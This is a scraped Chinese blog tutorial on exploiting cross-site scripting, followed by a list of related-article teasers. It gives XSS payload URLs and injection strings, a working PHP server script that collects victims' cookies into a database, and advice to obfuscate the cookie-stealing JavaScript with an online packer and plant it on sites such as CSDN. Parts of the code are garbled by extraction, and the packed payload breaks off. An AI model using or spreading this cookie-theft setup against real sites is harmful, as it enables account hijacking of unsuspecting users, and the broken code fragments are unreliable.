%3c php foreach%3e,Web安全学习一之XSS漏洞的利用

最新推荐文章于 2023-10-13 14:45:25 发布
最新推荐文章于 2023-10-13 14:45:25 发布
阅读量321 收藏
点赞数
文章标签: %3c php foreach%3e

bb2d1e0cd592577ad5043ffe8b9e92ed.png

什么是XSS

XSS 意为跨站脚本攻击(Cross Site Scripting),缩写应该是CSS,但是已经有了一个层叠样式表(Cascading Style Sheets),所以就叫它XSS了。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的,最常见的就是拿到攻击者的 Cookie 然后就可以登录别人的账号了。

XSS实例

最简单的形式就是从URL中直接插入恶意的 JavaScript 代码,最简单的实例如下:

1

2

3

4

$input = $_GET['info'];

echo $input;

服务端接收到了数据并执行了输出操作。这样的话就完全可以利用了,你可以向参数输入任意代码。 这个服务端的测试用例网址是 http://res.cuiqingcai.com/hack/xss1.php 你可以直接在参数后面加入 JavaScript 代码,例如 http://res.cuiqingcai.com/hack/xss1.php?info=%3Cscript%3Ealert(%27hello%27)%3C/script%3E%3C/script%3E) 直接打开便实现了最简单的 XSS 攻击,不过有的浏览器对此种攻击方式执行了过滤,例如 Chrome, Firefox。有的未执行过滤的浏览器是可以正常演示的。正常的结果应该是输出一个提示框。 接下来再演示另一种攻击方式。 测试网址是 http://res.cuiqingcai.com/hack/xss2.html 源代码如下

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

TEST XSS

function test(){

var text = document.getElementById('text').value;

var new_text = 'test';

console.log(new_text);

document.getElementById('content').innerHTML = new_text;

}

现在有一个输入框,点击按钮之后会将输入框的内容提取出来,然后拼凑到超链接标签里。在这里也可以执行XSS攻击。 比如输入

1

javascript:void(0)" οnclick=alert('ssss') "

提交之后会出现一个超链接,点击之后就可以执行你输入的代码,这次就弹出一个输入框。 当然你也可以插入一张图片,用 onerror 属性定义方法

1

"># javascript:void(0)">#

}

$mysqli = new mysqli("localhost", "root", "", "evil");

if ($mysqli->connect_errno) {

echo "Failed to connect to MySQL: (" . $mysqli->connect_errno . ") " . $mysqli->connect_error;

}

$url = $_GET['url'];

$content = $_GET['content'];

$time = date("Y-m-d H:i:s", time());

$items = explode(";", $content);

$js = '';

foreach ($items as $item) {

$js .= ("document.cookie='".trim($item)."';");

}

if ($url && $content && $stmt = $mysqli->prepare("insert into cookies(url, content, time, js) values (?, ?, ?, ?)")) {

$stmt->bind_param("ssss", $url, $content, $time, $js);

$result = $stmt->execute();

if ($result) {

echo "Collected Your Cookie
" ;

}

}

echo 'url:', $url, '
', 'content:', $content;

其实就是获取了url,还有cookie内容,然后插入了数据库保存起来。 这样,每成功一个XSS,就可以成功捕获到某个网站的Cookie。

混淆加密

其实将刚才的cookie.js贴到任意的网站都有可能引起XSS,比如CSDN。 为了防止JavaScript被看出来,可以利用在线加密网站加密。http://tool.chinaz.com/js.aspx 比如上面一段代码就被加密成这样,粘贴到控制台,就能成功获取Cookie了。

1

eval(function(p,a,c,k,e,d){e=function(c){return(c

叶减肥
关注
[红日安全]Web安全Day2 - XSS跨站实战攻防
hongrisec的博客
02-20 946
本文由红日安全成员: Aixic 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫Web安全实战,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Pytho...
渗透测试之pikachu PHP反序列化(未完成)
LKmnbZ's Blog
11-14 490
1. 概述 序列化与反序列化 序列化函数serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s); //把这个对象进行序列化 序列化后得到的结果是这个样子...
mysql %3cforeach_PHP开发的一些漏洞安全知识
weixin_35752122的博客
02-17 155
注意:这里只说下PHP程序的一些漏洞,不涉及服务器其它系统安全。这段时间的看了看一些PHP系统程序安全漏洞的文章,觉得做为一个PHP开发人员,如果不去看重这些漏洞,则不是一个合格的程序员。PHP漏洞很多,为了给自己提醒,也为了不断添加新的漏洞预防方法,在这里写下自己当前所知道的预防方法。如有不正确的地方还请指正。我当前工作中主要是对ecshop的二次开发,一直以为这个系统经过了这么多年,应该不会...
php foreach的陷阱
fang_li_na的博客
04-28 127
@foreach 的循环 $array = ['a','b','c']; foreach ($array as &$value){} foreach ($array as $value){} var_dump("<pre>", $array); 执行结果 array(3) { [0]=> string(1) "a" [1]=> string(1) "b" [2]=> &string(1) "b" } 看了很多网站的讲解,终于在网上看
PHP 数组 foreach引用导致的bug
weixin_33709590的博客
07-17 154
<?php $arr = array('a', 'b', 'c'); foreach($arr as &$v) {} foreach($arr as $v) {} var_dump($arr); /* 结果为: array(3) { [0]=> string(1) "a" [1]=> string(1) "b" [2]=&g...
php中的foreach问题
最新发布
zl5186888的博客
10-13 522
php4中引入了foreach结构,这是一种遍历数组的简单方式。相比传统的for循环,foreach能够更加便捷的获取键值对。在php5之前,foreach仅能用于数组;php5之后,利用foreach还能遍历对象(详见:遍历对象)。本文中仅讨论遍历数组的情况。foreach虽然简单,不过它可能会出现一些意外的行为,特别是代码涉及引用的情况下。下面列举了几种case,有助于我们进一步认清foreach的本质。问题1v) {echo "
phpforeach使用引用&的陷阱
panjiapengfly的博客
06-24 245
有时候我们为了改变数组的值,在foreach的时候加个&来表示引用。如下: foreach ($array as &$item) {} 这样一来,我们在循环中修改$item的值的时候,实际上修改的是$array中对应的值, 而如果不加&符号的话,在循环中修改$item的值不会影响到$array。 测试-加& 例: $array = [ 'name' => 'Jobs', 'age' => 50, ]; foreach ($a
PHP 安全检测代码片段(分享)
10-27
为了提高PHP开发的安全性,开发人员通常需要对用户输入的数据进行安全检测,避免诸如SQL注入、跨站脚本攻击(XSS)等安全漏洞的发生。本篇文章将对PHP中的安全检测代码片段进行详细分析介绍,帮助读者理解如何通过...
php 安全过滤函数代码
10-28
Web开发中,为了防止用户恶意输入内容,保障系统的安全性,开发者经常需要对用户的输入进行过滤处理。本文将详细介绍几个PHP中的安全过滤函数,包括其功能、实现原理以及如何在实际项目中应用这些函数。 #### 一...
XSS跨站脚本攻击
weixin_30505225的博客
04-26 1079
1、简介 跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身...
php for循环bug,PHP中使用foreach和引用导致程序BUG的问题介绍
weixin_31750655的博客
03-12 328
foreach 循环实例用法,在PHP中的foreach是用来进行循环对一个数组的所有元素,作者的foreach基本语法如下:FOREACH($array_variableas$value){[codetoexecute]}orFOREACH($array_variableas$key=>$value){[codetoexecute]}在这两种情况下,多次[代码执行]将被处死是等...
php代码审计【20】MetInfo 变量覆盖漏洞挖掘
司徒荆的博客
07-06 924
MetInfo 变量覆盖漏洞挖掘
PHP变量覆盖漏洞试验随笔
东隅的博客
09-15 497
PHP变量覆盖漏洞试验随笔
(渗透学习PHP($$)变量覆盖原理分析----变量覆盖漏洞
yang1234567898的博客
12-25 1413
如下代码段: <?php foreach (array("_COOKIE","_POST","_GET") as $_request){ foreach ( $$_request as $key => $value ){ $$key = $value } } ?> 首先将数组("_COOKIE","_POST","_GET")赋给$_request,即 $_request = ("_COOKIE","_POST","_GET") 然后拼接成...
一个foreach引发的坑
知识分享
05-17 1590
最近在翻看阿里巴巴Java开发手册,对照自己的代码规范,发现了代码中存在的不少缺陷。比如手册强制规定所有的POJO类属性必须使用包装类型。因为使用包装类型在使用起来会比较麻烦,有时候需要多加一些判断,我很好奇是否这些规定都落地实施了,于是到阿里云下载了几个SDK查看了一下,这个规范确实是都做到了,但也发现了有些强制要求的规范没有实施,比如不允许任何魔法值(即未经预先定义的常量)直接出现在代码中。 反例: String key = "Id#taobao_" + tradeId; cache.pu...
PHP foreach()语句的一个诡异问题
IT部落格
05-31 1245
现在有一个PHP脚本:<?php $array = array(1, 2, 3, 4); foreach ($array as $key => $value) { $value = &$array[$key]; echo current($array); } // 最后输出2233执行上面这个脚本,如注释所说,最终会输出2233这个结果,有木有觉得很诡异?为什么会是这个结果呢?首先,
PHP foreach变量的坑
hxmandzzx的博客
09-08 1063
foreach里面定义的变量在循环之外作用域不会消失,还可以生效 $array = array('key' =>'name');         $key = "aaaaa";         foreach ($array as $key => $value) {                      }         echo $key ;  打印出来的$key =
js中进行%3c php %3e,js中xss跨站脚本攻击的简单理解
weixin_30348079的博客
04-11 564
跨站脚本,称为xss这个术语用来表示一类的安全问题,指攻击者向目标web站点注入html标签或者脚本。来一个小栗子substring 返回介于两者之间的字符串,如果省去最后一个参数,则直接以length为填充window.location.search 返回/后面内容包括问号返回?后面的参数window.location.search.substring(1)decodeURIComponent(...
mybatis 里 foreach 里的坑
bug_yun的博客
06-20 1494
  问题如下:   &lt;select id="getUser" parameterType="hashmap" resultType="hashmap"&gt; SELECT &lt;include refid="primary" /&gt; , &lt;include refid="exPrimary" /&gt; F
变量覆盖漏洞分析:从BUUCTF-Web-Mark loves cat挑战看PHP安全
此外,还介绍了如何利用变量覆盖漏洞,并通过一个具体的CTF(Capture The Flag)挑战实例来展示如何通过分析网站源代码和利用.git泄露来获取敏感信息。" 在PHP编程中,变量覆盖漏洞是一个重要的安全问题,它发生在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值